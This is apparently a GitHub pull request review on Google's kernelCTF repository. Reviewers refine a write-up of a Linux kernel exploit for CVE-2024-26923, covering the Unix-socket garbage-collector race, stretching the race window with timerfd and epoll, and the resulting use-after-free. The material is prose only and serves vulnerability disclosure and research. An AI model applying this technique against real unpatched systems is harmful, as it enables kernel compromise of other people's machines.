kernelCTF: add CVE-2024-26923_lts_cos#308
kernelCTF: add CVE-2024-26923_lts_cos#308lambdasprocket wants to merge 1 commit intogoogle:masterfrom
Conversation
292688c to
bd68439
Compare
|
|
||
| We have to use the other CPU available to perform 2 operations during this window: | ||
| 1. Send the victim socket through this connecting socket. | ||
| 2. Close the victim socket |
There was a problem hiding this comment.
| 2. Close the victim socket | |
| 2. Close the victim socket, so that its standard file reference count drops to zero, leaving only the garbage collector's internal references. |
| We have to use the other CPU available to perform 2 operations during this window: | ||
| 1. Send the victim socket through this connecting socket. | ||
| 2. Close the victim socket | ||
| 3. Trigger garbage collection and run unix_gc() until the start of window 2. |
There was a problem hiding this comment.
| 3. Trigger garbage collection and run unix_gc() until the start of window 2. | |
| 3. Trigger garbage collection and run `unix_gc()` until the start of window 2, by closing an unrelated socket, which forces `unix_gc()` to wake up and scan the inflight list. |
| This function is triggered by executing connect on CPU 0. This CPU will do nothing else until the race conditions part of the exploit is over. | ||
|
|
||
| We have to use the other CPU available to perform 2 operations during this window: | ||
| 1. Send the victim socket through this connecting socket. |
There was a problem hiding this comment.
| 1. Send the victim socket through this connecting socket. | |
| 1. Send the victim socket through this connecting socket, using SCM_RIGHTS to make it an 'inflight' socket, which forces the garbage collector to track it. | |
| > Note: SCM_RIGHTS is a special message type that allows Unix sockets to send open file descriptors to each other. When a socket is sent this way but hasn't been read out of the queue yet, it is considered "inflight." The garbage collector specifically tracks inflight sockets to prevent cyclic memory leaks. |
| ... | ||
| ``` | ||
|
|
||
| This function is triggered by executing connect on CPU 0. This CPU will do nothing else until the race conditions part of the exploit is over. |
There was a problem hiding this comment.
| This function is triggered by executing connect on CPU 0. This CPU will do nothing else until the race conditions part of the exploit is over. | |
| This function is triggered by executing connect on CPU 0. To win the race, the exploit intentionally stalls this thread right inside Window 1. This CPU will do nothing else until the race conditions part of the exploit is over, leaving the newly created "embryo" socket (newsk) allocated but not yet linked to the receive queue. |
There was a problem hiding this comment.
Please check all of my assumptions in form of "suggestions". If you have an idea how to explain it better, please do.
|
|
||
| This function is triggered by executing connect on CPU 0. This CPU will do nothing else until the race conditions part of the exploit is over. | ||
|
|
||
| We have to use the other CPU available to perform 2 operations during this window: |
There was a problem hiding this comment.
| We have to use the other CPU available to perform 2 operations during this window: | |
| We have to use the other CPU available to perform 3 operations during this window: |
| 1. The first scan_children() can not see the embryo in the receive queue of the server socket | ||
| 2. The second scan_children() has to see the embryo. | ||
|
|
||
| This causes a decrement/increment mismatch and the resulting use-after-free. |
There was a problem hiding this comment.
| This causes a decrement/increment mismatch and the resulting use-after-free. | |
| This causes a decrement/increment mismatch and the resulting use-after-free. Because the garbage collector does not expect an embryo to be enqueued mid-scan, it misses the embryo during the first pass (failing to decrement the victim's `u->inflight` counter). When the stalled thread unfreezes, the embryo is enqueued. The GC sees it during the second pass and increments the victim's count. The victim's `unix_sock` reference count is now artificially, leaving a dangling pointer in the gc_inflight_list when the socket is closed. |
| @@ -0,0 +1,219 @@ | |||
| ## Triggering the race condition | |||
There was a problem hiding this comment.
Could you elaborate on the setup needed for the triggering race?
From what I see, the exploit sets up a listening server socket, a client socket to connect to it, and a separate "victim" socket that will eventually be corrupted. During the client's connect() call, the kernel dynamically allocates a new socket (the "embryo") to represent the server's side.
| To have a chance of aligning the two threads correctly we have to extend both race windows as much as possible. | ||
| To do that we use a well-known timerfd technique invented by Jann Horn. | ||
| The basic idea is to set hrtimer based timerfd to trigger a timer interrupt during our race window and attach a lot (as much as RLIMIT_NOFILE allows) | ||
| of epoll watches to this timerfd to make the time needed to handle the interrupt longer. |
There was a problem hiding this comment.
| of epoll watches to this timerfd to make the time needed to handle the interrupt longer. | |
| of epoll watches to this timerfd. When the timer fires, the kernel is forced to slowly iterate over hundreds of these watchers inside the interrupt handler, artificially stretching the race window from nanoseconds to milliseconds. |
|
|
||
| ## Exploiting the use-after-free | ||
|
|
||
| At this point our victim socket is inflight, linked in the gc_inflight_list and has a inflight reference value of 2. |
There was a problem hiding this comment.
| At this point our victim socket is inflight, linked in the gc_inflight_list and has a inflight reference value of 2. | |
| At this point our victim socket is inflight, linked in the gc_inflight_list and has a inflight reference value of 2 (stored inside the struct unix_sock). |
| ## Exploiting the use-after-free | ||
|
|
||
| At this point our victim socket is inflight, linked in the gc_inflight_list and has a inflight reference value of 2. | ||
| Next step is to receive this socket and close it. This will cause its struct sock object to be freed, but it will stay referenced in the gc_inflight_list. |
There was a problem hiding this comment.
| Next step is to receive this socket and close it. This will cause its struct sock object to be freed, but it will stay referenced in the gc_inflight_list. | |
| Next step is to receive this socket and close it. Receiving it drops the inflight count from 2 down to 1, and closing it drops its standard file descriptor reference count to 0. This will cause its struct sock object to be freed, but it will stay referenced in the gc_inflight_list. |
No description provided.